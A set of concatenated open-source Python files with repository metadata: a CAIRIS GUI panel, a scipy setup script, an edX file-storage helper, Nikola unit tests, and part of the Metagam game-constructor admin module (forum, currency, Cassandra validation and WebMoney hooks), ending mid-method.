        goalCtrl.SetItems(goals)
        goalCtrl.SetValue('')

    def loadControls(self, stepEx):
        # stepEx layout: (name, dimension type, dimension name, category,
        # definition).
        nameCtrl = self.FindWindowById(EXCEPTION_TEXTNAME_ID)
        nameCtrl.SetValue(stepEx[0])
        goalCtrl = self.FindWindowById(EXCEPTION_COMBOGOALS_ID)
        dimType = stepEx[1]
        if (dimType == 'goal'):
            typeCtrl = self.FindWindowById(EXCEPTION_RADIOGOAL_ID)
            typeCtrl.SetValue(True)
        else:
            typeCtrl = self.FindWindowById(EXCEPTION_RADIOREQUIREMENT_ID)
            typeCtrl.SetValue(True)
            # NOTE(review): only this branch refreshes the combo items;
            # the goal branch relies on the list built in __init__ --
            # confirm that is intended.
            goals = self.dbProxy.getDimensionNames('requirement')
            goalCtrl.SetItems(goals)
        dimName = stepEx[2]
        goalCtrl.SetValue(dimName)
        exCat = stepEx[3]
        catCtrl = self.FindWindowById(EXCEPTION_COMBOCATEGORY_ID)
        catCtrl.SetValue(exCat)
        exDef = stepEx[4]
        defCtrl = self.FindWindowById(EXCEPTION_TEXTDEFINITION_ID)
        defCtrl.SetValue(exDef)
|
nathanbjenx/cairis
|
cairis/gui/ExceptionPanel.py
|
Python
|
apache-2.0
| 3,544
|
from __future__ import division, print_function, absolute_import
def configuration(parent_package='', top_path=None):
    """Build the numpy.distutils configuration for scipy.sparse.linalg."""
    from numpy.distutils.misc_util import Configuration

    config = Configuration('linalg', parent_package, top_path)
    # Sub-packages: iterative solvers, direct solvers, eigenvalue routines.
    for subpackage in ('isolve', 'dsolve', 'eigen'):
        config.add_subpackage(subpackage)
    config.add_data_dir('tests')
    return config
if __name__ == '__main__':
    # Allow building this sub-package standalone.
    from numpy.distutils.core import setup
    setup(**configuration(top_path='').todict())
|
lhilt/scipy
|
scipy/sparse/linalg/setup.py
|
Python
|
bsd-3-clause
| 525
|
import json
import os
import os.path
import types

from django.conf import settings

from models import FSExpirations

# Select the filesystem backend once at import time, driven by settings.
if settings.DJFS['type'] == 'osfs':
    from fs.osfs import OSFS
elif settings.DJFS['type'] == 's3fs':
    from fs.s3fs import S3FS
    from boto.s3.connection import S3Connection
    from boto.s3.key import Key
    # Module-level S3 connection; re-created on timeout in get_s3_url().
    s3conn = S3Connection()
else:
    raise AttributeError("Bad filesystem: "+str(settings.DJFS['type']))
def get_filesystem(namespace):
    ''' Returns a pyfilesystem for static module storage.

    The file system will have two additional properties:

    1) get_url: A way to get a URL for a static file download
    2) expire: A way to expire files (so they are automatically destroyed)
    '''
    # Dispatch on the backend configured in settings.DJFS.
    if settings.DJFS['type'] == 'osfs':
        return get_osfs( namespace )
    elif settings.DJFS['type'] == 's3fs':
        return get_s3fs( namespace )
    else:
        raise AttributeError("Bad filesystem: "+str(settings.DJFS['type']))
def expire_objects():
    ''' Remove all obsolete objects from the file systems. Untested. '''
    # Sort by module so consecutive objects share a filesystem handle and
    # we only open each namespace once.
    objects = sorted(FSExpirations.expired(), key=lambda x: x.module)
    fs = None
    module = None
    for o in objects:
        if module != o.module:
            module = o.module
            fs = get_filesystem(module)
        if fs.exists(o.filename):
            fs.remove(o.filename)
        # Drop the expiration record regardless of whether the file existed.
        o.delete()
def patch_fs(fs, namespace, url_method):
    ''' Patch a filesystem object, binding two extra methods onto it.

    get_url(filename, timeout) -- return a URL for a resource stored on
    this filesystem; timeout bounds how long the URL stays valid.

    expire(filename, seconds, days=0, expires=True) -- register how long
    the system should keep the resource; expires=False keeps it forever.
    Without calling expire, no guarantee is made about resource lifetime.

    Returns the same (now patched) fs object.
    '''
    def expire(self, filename, seconds, days=0, expires=True):
        ''' Record the lifespan of *filename* in the expirations table.

        expires=False means the file will never be removed; otherwise
        seconds and days together give the time to expiration.
        '''
        FSExpirations.create_expiration(namespace, filename, seconds, days=days, expires=expires)

    # Bind both callables as instance methods on this particular object.
    fs.get_url = types.MethodType(url_method, fs)
    fs.expire = types.MethodType(expire, fs)
    return fs
def get_osfs(namespace):
    ''' Helper method to get_filesystem for a file system on disk '''
    # One directory per namespace under the configured root; created on
    # first use.
    full_path = os.path.join(settings.DJFS['directory_root'], namespace)
    if not os.path.exists(full_path):
        os.makedirs(full_path)
    osfs = OSFS(full_path)
    # URLs are simply paths under the configured url_root; the timeout
    # parameter is accepted for interface parity but ignored on disk.
    osfs = patch_fs(osfs, namespace, lambda self, filename, timeout=0: os.path.join(settings.DJFS['url_root'], namespace, filename))
    return osfs
def get_s3fs(namespace):
    ''' Helper method to get_filesystem for a file system on S3 '''
    fullpath = namespace
    # Optional shared key prefix in front of every namespace.
    if 'prefix' in settings.DJFS:
        fullpath = os.path.join(settings.DJFS['prefix'], fullpath)
    s3fs = S3FS(settings.DJFS['bucket'], fullpath)

    def get_s3_url(self, filename, timeout=60):
        '''Return a signed, time-limited S3 download URL for *filename*.'''
        global s3conn
        try:
            return s3conn.generate_s3_url(timeout, 'GET', bucket = settings.DJFS['bucket'], key = filename)
        except: # If connection has timed out
            # Deliberate best-effort: rebuild the shared connection and
            # retry once.
            s3conn = S3Connection()
            return s3conn.generate_s3_url(timeout, 'GET', bucket = settings.DJFS['bucket'], key = filename)

    s3fs = patch_fs(s3fs, namespace, get_s3_url)
    return s3fs
|
edx/insights
|
src/edinsights/modulefs/modulefs.py
|
Python
|
agpl-3.0
| 3,765
|
# -*- coding: utf-8 -*-
import unittest
import mock
import os
import lxml.html
from nikola.post import get_meta
from nikola.utils import (
demote_headers, TranslatableSetting, get_crumbs, TemplateHookRegistry,
get_asset_path, get_theme_chain, get_translation_candidate)
from nikola.plugins.task.sitemap import get_base_path as sitemap_get_base_path
class dummy(object):
    """Minimal stand-in for a Nikola post/site object used by the tests."""

    default_lang = 'en'
class GetMetaTest(unittest.TestCase):
    """Tests for nikola.post.get_meta: reading metadata from post
    content, falling back to the filename, and extracting fields via a
    filename regex.  File reads are mocked with mock_open."""

    def test_getting_metadata_from_content(self):
        # Metadata embedded in the post body is parsed out of the file.
        file_metadata = ".. title: Nikola needs more tests!\n"\
                        ".. slug: write-tests-now\n"\
                        ".. date: 2012/09/15 19:52:05\n"\
                        ".. tags:\n"\
                        ".. link:\n"\
                        ".. description:\n"\
                        "Post content\n"
        opener_mock = mock.mock_open(read_data=file_metadata)
        post = dummy()
        post.source_path = 'file_with_metadata'
        post.metadata_path = 'file_with_metadata.meta'
        with mock.patch('nikola.post.io.open', opener_mock, create=True):
            meta, nsm = get_meta(post)
        self.assertEqual('Nikola needs more tests!', meta['title'])
        self.assertEqual('write-tests-now', meta['slug'])
        self.assertEqual('2012/09/15 19:52:05', meta['date'])
        # Empty metadata fields must not appear in the result.
        self.assertFalse('tags' in meta)
        self.assertFalse('link' in meta)
        self.assertFalse('description' in meta)
        self.assertTrue(nsm)

    def test_get_title_from_fname(self):
        # With no title in the content, the supplied filename is used.
        file_metadata = ".. slug: write-tests-now\n"\
                        ".. date: 2012/09/15 19:52:05\n"\
                        ".. tags:\n"\
                        ".. link:\n"\
                        ".. description:\n"
        opener_mock = mock.mock_open(read_data=file_metadata)
        post = dummy()
        post.source_path = 'file_with_metadata'
        post.metadata_path = 'file_with_metadata.meta'
        with mock.patch('nikola.post.io.open', opener_mock, create=True):
            meta, nsm = get_meta(post, 'file_with_metadata')
        self.assertEqual('file_with_metadata', meta['title'])
        self.assertEqual('write-tests-now', meta['slug'])
        self.assertEqual('2012/09/15 19:52:05', meta['date'])
        self.assertFalse('tags' in meta)
        self.assertFalse('link' in meta)
        self.assertFalse('description' in meta)
        self.assertTrue(nsm)

    def test_use_filename_as_slug_fallback(self):
        # With no slug in the content, the filename is slugified instead.
        file_metadata = ".. title: Nikola needs more tests!\n"\
                        ".. date: 2012/09/15 19:52:05\n"\
                        ".. tags:\n"\
                        ".. link:\n"\
                        ".. description:\n\n"\
                        "Post content\n"
        opener_mock = mock.mock_open(read_data=file_metadata)
        post = dummy()
        post.source_path = 'Slugify this'
        post.metadata_path = 'Slugify this.meta'
        with mock.patch('nikola.post.io.open', opener_mock, create=True):
            meta, nsm = get_meta(post, 'Slugify this')
        self.assertEqual('Nikola needs more tests!', meta['title'])
        self.assertEqual('slugify-this', meta['slug'])
        self.assertEqual('2012/09/15 19:52:05', meta['date'])
        self.assertFalse('tags' in meta)
        self.assertFalse('link' in meta)
        self.assertFalse('description' in meta)
        self.assertTrue(nsm)

    def test_extracting_metadata_from_filename(self):
        # A named-group regex pulls date/slug/title from the filename.
        post = dummy()
        post.source_path = '2013-01-23-the_slug-dubdubtitle.md'
        post.metadata_path = '2013-01-23-the_slug-dubdubtitle.meta'
        with mock.patch('nikola.post.io.open', create=True):
            meta, _ = get_meta(
                post,
                '(?P<date>\d{4}-\d{2}-\d{2})-(?P<slug>.*)-(?P<title>.*)\.md')
        self.assertEqual('dubdubtitle', meta['title'])
        self.assertEqual('the_slug', meta['slug'])
        self.assertEqual('2013-01-23', meta['date'])

    def test_get_meta_slug_only_from_filename(self):
        # Without a regex, only the slug is derived from the filename stem.
        post = dummy()
        post.source_path = 'some/path/the_slug.md'
        post.metadata_path = 'some/path/the_slug.meta'
        with mock.patch('nikola.post.io.open', create=True):
            meta, _ = get_meta(post)
        self.assertEqual('the_slug', meta['slug'])
class HeaderDemotionTest(unittest.TestCase):
    """Tests for nikola.utils.demote_headers.

    NOTE(review): the original methods were named ``demote_by_*`` without a
    ``test_`` prefix, so unittest discovery silently skipped all of them.
    They are renamed here so they actually run, and the deprecated
    ``assertEquals`` alias is replaced with ``assertEqual``.
    """

    # Fixture document shared by every demotion test.
    INPUT = '''\
<h1>header 1</h1>
<h2>header 2</h2>
<h3>header 3</h3>
<h4>header 4</h4>
<h5>header 5</h5>
<h6>header 6</h6>
'''

    def _assert_demotion(self, level, expected_output):
        """Demote INPUT by *level* and compare the serialized results."""
        doc = lxml.html.fromstring(self.INPUT)
        outdoc = lxml.html.fromstring(expected_output)
        demote_headers(doc, level)
        self.assertEqual(lxml.html.tostring(outdoc), lxml.html.tostring(doc))

    def test_demote_by_zero(self):
        # Level 0 must leave the document untouched.
        self._assert_demotion(0, self.INPUT)

    def test_demote_by_one(self):
        # h6 cannot be demoted further and stays h6.
        self._assert_demotion(1, '''\
<h2>header 1</h2>
<h3>header 2</h3>
<h4>header 3</h4>
<h5>header 4</h5>
<h6>header 5</h6>
<h6>header 6</h6>
''')

    def test_demote_by_two(self):
        self._assert_demotion(2, '''\
<h3>header 1</h3>
<h4>header 2</h4>
<h5>header 3</h5>
<h6>header 4</h6>
<h6>header 5</h6>
<h6>header 6</h6>
''')

    def test_demote_by_minus_one(self):
        # Negative level promotes headers; h1 cannot go higher and stays h1.
        self._assert_demotion(-1, '''\
<h1>header 1</h1>
<h1>header 2</h1>
<h2>header 3</h2>
<h3>header 4</h3>
<h4>header 5</h4>
<h5>header 6</h5>
''')
class TranslatableSettingsTest(unittest.TestCase):
    """Tests for translatable settings."""

    @staticmethod
    def _as_text(setting):
        """Coerce a TranslatableSetting to text on both Python 2 and 3."""
        try:
            return unicode(setting)
        except NameError:  # Python 3
            return str(setting)

    def test_string_input(self):
        """Tests for string input."""
        inp = 'Fancy Blog'
        S = TranslatableSetting('S', inp, {'xx': ''})
        S.default_lang = 'xx'
        S.lang = 'xx'
        # No language, the real language and a fake language must all
        # resolve to the one underlying value.
        self.assertEqual(self._as_text(S), inp)
        self.assertEqual(S(), inp)
        self.assertEqual(S('xx'), inp)
        self.assertEqual(S('zz'), inp)
        self.assertEqual(S.lang, 'xx')
        self.assertEqual(S.default_lang, 'xx')

    def test_dict_input(self):
        """Tests for dict input."""
        inp = {'xx': 'Fancy Blog',
               'zz': 'Schmancy Blog'}
        S = TranslatableSetting('S', inp, {'xx': '', 'zz': ''})
        S.default_lang = 'xx'
        S.lang = 'xx'
        self.assertEqual(self._as_text(S), inp['xx'])
        self.assertEqual(S(), inp['xx'])
        self.assertEqual(S('xx'), inp['xx'])
        self.assertEqual(S('zz'), inp['zz'])
        # Unknown language falls back to the default language.
        self.assertEqual(S('ff'), inp['xx'])

    def test_dict_input_lang(self):
        """Test dict input, with a language change along the way."""
        inp = {'xx': 'Fancy Blog',
               'zz': 'Schmancy Blog'}
        S = TranslatableSetting('S', inp, {'xx': '', 'zz': ''})
        S.default_lang = 'xx'
        S.lang = 'xx'
        self.assertEqual(self._as_text(S), inp['xx'])
        self.assertEqual(S(), inp['xx'])
        # Change the language.
        # WARNING: DO NOT set lang locally in real code!  Set it globally
        # instead (TranslatableSetting.lang = ...).
        # WARNING: TranslatableSetting.lang overrides the current locale
        # settings returned by LocaleBorg!  Use with care!
        S.lang = 'zz'
        self.assertEqual(self._as_text(S), inp['zz'])
        self.assertEqual(S(), inp['zz'])
def test_get_metadata_from_file():
    # These were doctests and not running :-P
    from nikola.post import _get_metadata_from_file as g
    assert list(g([]).values()) == []
    assert str(g([".. title: FooBar"])["title"]) == 'FooBar'
    # A blank line terminates the metadata header.
    assert 'title' not in g(["", "", ".. title: FooBar"])
    assert 'title' in g(["", ".. title: FooBar"])
def test_get_asset_path():
    """Assets resolve through the theme chain; `/` normalization for Windows."""
    themes = get_theme_chain('bootstrap3', ['themes'])

    def normalized(path):
        return path.replace('\\', '/')

    # Inherited from the base theme.
    assert normalized(get_asset_path('assets/css/nikola_rst.css', themes)).endswith(
        'nikola/data/themes/base/assets/css/nikola_rst.css')
    # Overridden by bootstrap3.
    assert normalized(get_asset_path('assets/css/theme.css', themes)).endswith(
        'nikola/data/themes/bootstrap3/assets/css/theme.css')
    # Extra search folders participate in the lookup.
    assert normalized(get_asset_path('nikola.py', themes, {'nikola': ''})).endswith(
        'nikola/nikola.py')
    assert get_asset_path('nikola.py', themes, {'nikola': 'nikola'}) is None
    assert normalized(get_asset_path('nikola/nikola.py', themes, {'nikola': 'nikola'})).endswith(
        'nikola/nikola.py')
def test_get_crumbs():
    """Breadcrumbs for gallery/listing paths."""
    def check(crumbs, expected):
        assert len(crumbs) == len(expected)
        for got, want in zip(crumbs, expected):
            assert got == want

    check(get_crumbs('galleries'),
          [['#', 'galleries']])
    check(get_crumbs(os.path.join('galleries', 'demo')),
          [['..', 'galleries'], ['#', 'demo']])
    check(get_crumbs(os.path.join('listings', 'foo', 'bar'), is_file=True),
          [['..', 'listings'], ['.', 'foo'], ['#', 'bar']])
def test_get_translation_candidate():
    """Translation file names for both supported pattern layouts."""
    # Layout 1: language between path and extension.
    config = {'TRANSLATIONS_PATTERN': '{path}.{lang}.{ext}',
              'DEFAULT_LANG': 'en', 'TRANSLATIONS': {'es': '1', 'en': 1}}
    for path, lang, expected in (
            ('*.rst', 'es', '*.es.rst'),
            ('fancy.post.rst', 'es', 'fancy.post.es.rst'),
            ('*.es.rst', 'es', '*.es.rst'),
            ('*.es.rst', 'en', '*.rst'),
            ('cache/posts/fancy.post.es.html', 'en', 'cache/posts/fancy.post.html'),
            ('cache/posts/fancy.post.html', 'es', 'cache/posts/fancy.post.es.html'),
            ('cache/pages/charts.html', 'es', 'cache/pages/charts.es.html'),
            ('cache/pages/charts.html', 'en', 'cache/pages/charts.html')):
        assert get_translation_candidate(config, path, lang) == expected
    # Layout 2: language after the extension.
    config = {'TRANSLATIONS_PATTERN': '{path}.{ext}.{lang}',
              'DEFAULT_LANG': 'en', 'TRANSLATIONS': {'es': '1', 'en': 1}}
    for path, lang, expected in (
            ('*.rst', 'es', '*.rst.es'),
            ('*.rst.es', 'es', '*.rst.es'),
            ('*.rst.es', 'en', '*.rst'),
            ('cache/posts/fancy.post.html.es', 'en', 'cache/posts/fancy.post.html'),
            ('cache/posts/fancy.post.html', 'es', 'cache/posts/fancy.post.html.es')):
        assert get_translation_candidate(config, path, lang) == expected
def test_TemplateHookRegistry():
    """Registered strings and callables are rendered joined by newlines."""
    registry = TemplateHookRegistry('foo', None)
    registry.append('Hello!')
    registry.append(lambda name: 'Hello ' + name + '!', False, 'world')
    assert registry() == 'Hello!\nHello world!'
def test_sitemap_get_base_path():
    """Base paths always end with a slash, regardless of the input URL form."""
    cases = (
        ('http://some.site', '/'),
        ('http://some.site/', '/'),
        ('http://some.site/some/sub-path', '/some/sub-path/'),
        ('http://some.site/some/sub-path/', '/some/sub-path/'),
    )
    for url, expected in cases:
        assert sitemap_get_base_path(url) == expected
if __name__ == '__main__':
    # Allow running this test module directly: python test_utils.py
    unittest.main()
|
gwax/nikola
|
tests/test_utils.py
|
Python
|
mit
| 13,389
|
#!/usr/bin/python2.6
# This file is a part of Metagam project.
#
# Metagam is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# Metagam is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Metagam. If not, see <http://www.gnu.org/licenses/>.
from mg import *
from mg.core.auth import UserPermissions, UserPermissionsList
from mg.core.queue import Schedule
from mg.core.cluster import DBTempFileList
from mg.constructor.players import DBPlayer, DBCharacter, DBCharacterForm, DBCharacterList
from mg.core.config import DBConfigGroupList
import mg.constructor.common
from mg.core.projects import Project, ProjectList
from uuid import uuid4
import mg
import time
import datetime
import re
# Admin URI for removing a WMID binding: "<user-hex>/<wmid-hex>".
re_wmauth_remove = re.compile(r'^([0-9a-f]+)/([0-9a-f]+)$')
# Forum [code]...[/code] blocks (may span lines, hence DOTALL).
re_code = re.compile(r'\[code\].*?\[\/code\]', re.DOTALL)
# Heuristic: a line that looks like indented script code.
re_script_line = re.compile(r'^( )+[a-z]+')
# Heuristic: a line that is a (possibly indented) closing curly brace.
re_script_curly = re.compile(r'^( )*}')
# cassmaint admin URI: "<app-tag>" or "<app-tag>/<command>".
re_cassmaint_uri = re.compile(r'^([a-z0-9]{1,32})(?:|/(.+))$')
class DBUserWMID(CassandraObject):
    """Cassandra record binding a constructor user to a verified WMID."""
    clsname = "UserWMID"
    # Secondary indexes: all records ordered by "added", plus lookups
    # by user id and by WMID.
    indexes = {
        "all": [[], "added"],
        "user": [["user"]],
        "wmid": [["wmid"]],
    }
class DBUserWMIDList(CassandraObjectList):
    """List accessor for DBUserWMID records."""
    objcls = DBUserWMID
class ConstructorUtils(Module):
    """Small helpers shared by the constructor admin interface."""

    def register(self):
        self.rhook("menu-admin-top.list", self.menu_admin_top_list, priority=-500)

    def menu_admin_top_list(self, topmenu):
        """Add links back to the public constructor site to the admin top menu."""
        host = self.main_host
        topmenu.extend([
            {"href": "//www.%s/forum" % host, "text": self._("Forum"), "tooltip": self._("Go to the Constructor forum")},
            {"href": "//www.%s/cabinet" % host, "text": self._("Cabinet"), "tooltip": self._("Cabinet")},
        ])
class Constructor(Module):
    def register(self):
        """Declare module dependencies and register all constructor hooks."""
        # The web stack must be loaded before everything else.
        self.rdep(["mg.core.web.Web"])
        # Full set of modules the constructor application is built from.
        self.rdep([
            "mg.core.l10n.L10n",
            "mg.socio.Socio", "mg.socio.SocioAdmin", "mg.socio.Forum", "mg.admin.AdminInterface", "mg.socio.ForumAdmin",
            "mg.socio.rules.ForumRules", "mg.socio.rules.ForumRulesAdmin",
            "mg.core.auth.Sessions", "mg.core.auth.Interface", "mg.core.cluster.Cluster", "mg.core.hetzner.HetznerAdmin",
            "mg.core.emails.Email", "mg.core.queue.Queue", "mg.core.cass_maintenance.CassandraMaintenance", "mg.admin.wizards.Wizards",
            "mg.core.projects.Projects",
            "mg.constructor.script.ScriptEngine",
            "mg.constructor.admin.ConstructorUtils", "mg.core.money.Money", "mg.core.money.MoneyAdmin", "mg.constructor.dashboard.ProjectDashboard",
            "mg.constructor.domains.Domains", "mg.constructor.domains.DomainsAdmin",
            "mg.core.money.Xsolla", "mg.core.money.XsollaAdmin",
            "mg.constructor.design.SocioInterface",
            "mg.constructor.interface.Dynamic",
            "mg.constructor.doc.Documentation", "mg.core.sites.Counters", "mg.core.sites.CountersAdmin", "mg.core.sites.SiteAdmin",
            "mg.core.realplexor.Realplexor", "mg.core.realplexor.RealplexorAdmin", "mg.core.emails.EmailAdmin",
            "mg.socio.telegrams.Telegrams",
            "mg.core.cluster.ClusterAdmin", "mg.constructor.auth.AuthAdmin", "mg.core.auth.Dossiers",
            "mg.socio.smiles.Smiles", "mg.socio.smiles.SmilesAdmin",
            "mg.core.emails.EmailSender", "mg.constructor.emails.EmailSenderAdmin",
            "mg.socio.restraints.Restraints", "mg.socio.restraints.RestraintsAdmin",
            "mg.core.modifiers.Modifiers",
            "mg.constructor.paidservices.PaidServices", "mg.constructor.paidservices.PaidServicesAdmin",
            "mg.socio.paidservices.PaidServices",
            "mg.core.dbexport.Export",
            "mg.core.money.WebMoney", "mg.core.money.WebMoneyAdmin",
            "mg.constructor.reqauction.ReqAuction", "mg.constructor.reqauction.ReqAuctionAdmin",
            "mg.core.sites.Favicon", "mg.core.sites.FaviconAdmin",
            "mg.core.permissions_editor.Permissions", "mg.core.permissions_editor.PermissionsAdmin",
            "mg.constructor.marketing.MarketingAdmin",
            "mg.constructor.marketing.GoogleAnalytics", "mg.constructor.marketing.GoogleAnalyticsAdmin",
            "mg.constructor.socialnets.SocialNets", "mg.constructor.socialnets.SocialNetsAdmin",
            "mg.core.monitoring.ClusterMonitor",
            "mg.core.ssl.RedirectSSLModule", "mg.constructor.money.AdminDonate",
            "mg.core.money.XsollaActivation",
            "mg.core.tasks.TasksAdmin",
            "mg.constructor.custommodules.CustomModulesModule",
        ])
        # Web UI and authentication hooks.
        self.rhook("web.setup_design", self.web_setup_design)
        self.rhook("ext-index.index", self.index, priv="public")
        self.rhook("ext-cabinet.index", self.cabinet_index, priv="logged")
        self.rhook("auth.redirects", self.redirects)
        self.rhook("ext-cabinet.settings", self.cabinet_settings, priv="logged")
        self.rhook("ext-constructor.newgame", self.constructor_newgame, priv="logged")
        # Project lifecycle and maintenance hooks.
        self.rhook("objclasses.list", self.objclasses_list)
        self.rhook("queue-gen.schedule", self.schedule)
        self.rhook("projects.cleanup_inactive", self.cleanup_inactive)
        self.rhook("projects.appcheck", self.appcheck)
        self.rhook("project.title", self.project_title)
        self.rhook("forum-admin.init-categories", self.forum_init_categories)
        self.rhook("projects.list", self.projects_list)
        self.rhook("projects.owned_by", self.projects_owned_by)
        self.rhook("project.cleanup", self.cleanup)
        self.rhook("project.missing", self.missing)
        self.rhook("web.universal_variables", self.universal_variables)
        self.rhook("auth.register-form", self.register_form)
        self.rhook("auth.password-changed", self.password_changed)
        self.rhook("ext-test.delay", self.test_delay, priv="disabled")
        self.rhook("indexpage.render", self.indexpage_render)
        self.rhook("telegrams.params", self.telegrams_params)
        self.rhook("email.sender", self.email_sender)
        self.rhook("ext-constructor.game", self.constructor_game, priv="logged")
        # Money / WebMoney integration hooks.
        self.rhook("currencies.list", self.currencies_list, priority=100)
        self.rhook("xsolla.payment-args", self.payment_args)
        self.rhook("wmlogin.authorized", self.wmlogin_authorized)
        self.rhook("wmid.check", self.wmid_check)
        self.rhook("auth.user-auth-table", self.auth_user_table)
        self.rhook("permissions.list", self.permissions_list)
        self.rhook("ext-admin-wmauth.remove", self.wmauth_remove, priv="auth.wmid")
        self.rhook("security.list-roles", self.list_roles)
        self.rhook("security.users-roles", self.users_roles)
        # Miscellaneous site hooks.
        self.rhook("ext-favicon.ico.index", self.favicon, priv="public")
        self.rhook("forum.reply-form", self.forum_reply_form)
        self.rhook("forum.topic-form", self.forum_topic_form)
        self.rhook("constructor.project-options-main", self.project_options)
        self.rhook("ext-admin-cassmaint.validate", self.admin_validate, priv="cassmaint.validate")
        self.rhook("headmenu-admin-cassmaint.validate", self.headmenu_validate)
        self.rhook("project.logo", self.project_logo)
        self.rhook("project.description", self.project_description)
def project_logo(self):
return "%s://www.%s/st/constructor/logo/rounded.jpg" % (self.main_app().protocol, self.main_host)
    def project_description(self):
        """Return a short localized description of the constructor project."""
        return self._("MMO Constructor is a service allowing users to create their own online games")
def project_options(self, project, options):
if self.req().has_access("cassmaint.validate"):
if project:
options.append({"title": self._("Cassandra DB validation"), "value": '<hook:admin.link href="cassmaint/validate/%s" title="%s" />' % (project.uuid, self._("open"))})
else:
options.append({"title": self._("Cassandra DB validation"), "value": '<hook:admin.link href="cassmaint/validate/%s" title="%s" />' % (self.app().tag, self._("open"))})
def forum_topic_form(self, topic, form, mode):
if mode == "validate":
self.forum_reply_form(form, "validate")
elif mode == "form":
self.forum_reply_form(form, "render")
def headmenu_validate(self, args):
m = re_cassmaint_uri.match(args)
if m:
app_tag, cmd = m.group(1, 2)
if cmd is None:
return ["Cassandra", "constructor/project-dashboard/%s" % app_tag]
else:
return [htmlescape(cmd), "cassmaint/validate/%s" % app_tag]
    def admin_validate(self):
        """Admin handler for "cassmaint/validate/<app>[/<class>]".

        Without a class name, renders a table of all object classes with
        their last validation results.  With a class name, validates that
        class, records the result in the app config and reports counters.
        """
        req = self.req()
        m = re_cassmaint_uri.match(req.args)
        if not m:
            self.call("web.not_found")
        app_tag, cmd = m.group(1, 2)
        app = self.app().inst.appfactory.get_by_tag(app_tag)
        if not app:
            self.call("web.not_found")
        # Collect object classes registered by the target application.
        objclasses = {}
        app.hooks.call("objclasses.list", objclasses)
        if cmd is not None:
            if cmd not in objclasses:
                # Unknown class name: back to the overview.
                self.call("admin.redirect", "cassmaint/validate/%s" % app_tag)
            cnt = self.call("cassmaint.validate", app, cls=cmd)
            if cnt is None:
                self.call("admin.response", self._("Validation failed"), {})
            else:
                # Remember when this class was last validated and how many
                # objects it contained at that moment.
                config = app.config_updater()
                config.set("cassmaint.%s" % cmd, {"cnt": cnt["obj"], "performed": self.now()})
                config.store()
                self.call("admin.response", self._("Validated objects: {obj}, indexes: {index}<br />Missing index keys restored: {missing}<br />Orphaned index keys deleted: {orphaned}").format(**cnt), {})
        # No class given: render the overview table.
        rows = []
        for cls in sorted(objclasses.keys()):
            perf = app.config.get("cassmaint.%s" % cls)
            if perf:
                perf = self._("{cnt} objects at {performed}").format(cnt=perf["cnt"], performed=self.call("l10n.time_local", perf["performed"]))
            rows.append([
                cls,
                perf,
                u'<hook:admin.link href="cassmaint/validate/%s/%s" title="%s" />' % (app_tag, cls, self._("validate")),
            ])
        vars = {
            "tables": [
                {
                    "header": [
                        self._("Table name"),
                        self._("Last validation"),
                        self._("Validation"),
                    ],
                    "rows": rows
                }
            ]
        }
        self.call("admin.response_template", "admin/common/tables.html", vars)
    def forum_reply_form(self, form, mode):
        """Warn forum posters who paste script code without [code] tags.

        mode == "validate" adds a form error unless the poster checked
        "ignore_code"; mode == "render" draws that checkbox.
        """
        req = self.req()
        # Only inspect actual submissions.
        if not req.param("save") and not req.param("publish"):
            return
        content = req.param("content")
        # Already wrapped in [code]...[/code] — nothing to warn about.
        if re_code.search(content):
            return
        # Heuristic: the post "looks like" script code when it contains at
        # least one indented statement line and one closing-brace line.
        script_lines = 0
        curly_lines = 0
        has_script = False
        for line in content.split("\n"):
            if re_script_line.match(line):
                script_lines += 1
            if re_script_curly.match(line):
                curly_lines += 1
            if script_lines >= 1 and curly_lines >= 1:
                has_script = True
                break
        if not has_script:
            return
        if mode == "validate":
            if not req.param("ignore_code"):
                form.error("ignore_code", self._("It seems that your post contains script code without [code]...[/code] tags. Please select your script and press the 'CODE' button. It will make you code looking better. If you think this message is erroneous set the checkbox"), overwrite=False)
        elif mode == "render":
            form.checkbox(self._("Post as is, without [code][/code] tags"), "ignore_code", req.param("ignore_code"))
def favicon(self):
f = open("%s/data/logo/favicon.ico" % mg.__path__[0], "rb")
data = f.read()
f.close()
self.call("web.response", data, "image/x-icon")
def permissions_list(self, perms):
perms.append({"id": "auth.wmid", "name": self._("Managing authorized WMIDs")})
perms.append({"id": "cassmaint.validate", "name": self._("Validating and repairing cassandra database")})
def payment_args(self, args, options):
try:
req = self.req()
except AttributeError:
req = None
if req and req.user():
user = self.obj(User, req.user())
args["v1"] = user.get("name")
args["email"] = user.get("email")
    def currencies_list(self, currencies):
        """Define the constructor's real-money currency (MM$).

        Registered with priority=100 and ending in Hooks.Return so no other
        handler can add or override currency definitions.
        """
        currencies["MM$"] = {
            "real": True,
            "code": "MM$",
            "description": self._("This currency is sold for real money"),
            "format": "%.2f",
            "image": "/st-mg/constructor/money/mmdollar-image.png",
            "icon": "/st-mg/constructor/money/mmdollar-icon.png",
            # 1 MM$ costs 30 RUB.
            "real_price": 30.0,
            "real_currency": "RUB",
            "real_roubles": 30.0,
            "precision": 2,
            "name_plural": self._("MMO Constructor Dollars"),
            "name_local": self._("MMO Constructor Dollar/MMO Constructor Dollars"),
            "name_en": "MMO Constructor Dollar/MMO Constructor Dollars",
        }
        # Stop hook processing: this definition is authoritative.
        raise Hooks.Return()
    def test_delay(self):
        """Debug endpoint (priv=disabled): sleep 20 seconds, then answer "ok"."""
        Tasklet.sleep(20)
        self.call("web.response", "ok\n")
def register_form(self, form, mode):
req = self.req()
age18 = req.param("age18")
if mode == "validate":
if not age18:
form.error("age18", self._("You must confirm you are of the full legal age"))
elif mode == "render":
form.checkbox(self._("I confirm I'm of the full legal age"), "age18", age18)
def missing(self, tag):
app = self.app().inst.appfactory.get_by_tag(tag)
return app is None
    def forum_init_categories(self, cats):
        """Create the default forum categories for a fresh constructor forum."""
        # "order" controls display position; News auto-subscribes new users.
        cats.append({"id": uuid4().hex, "topcat": self._("Constructor"), "title": self._("News"), "description": self._("News related to the Constructor"), "order": 10.0, "default_subscribe": True})
        cats.append({"id": uuid4().hex, "topcat": self._("Constructor"), "title": self._("Support"), "description": self._("Constructor technical support"), "order": 20.0})
        cats.append({"id": uuid4().hex, "topcat": self._("Game Development"), "title": self._("Developers club"), "description": self._("Any talks related to the game development"), "order": 30.0})
    def project_title(self):
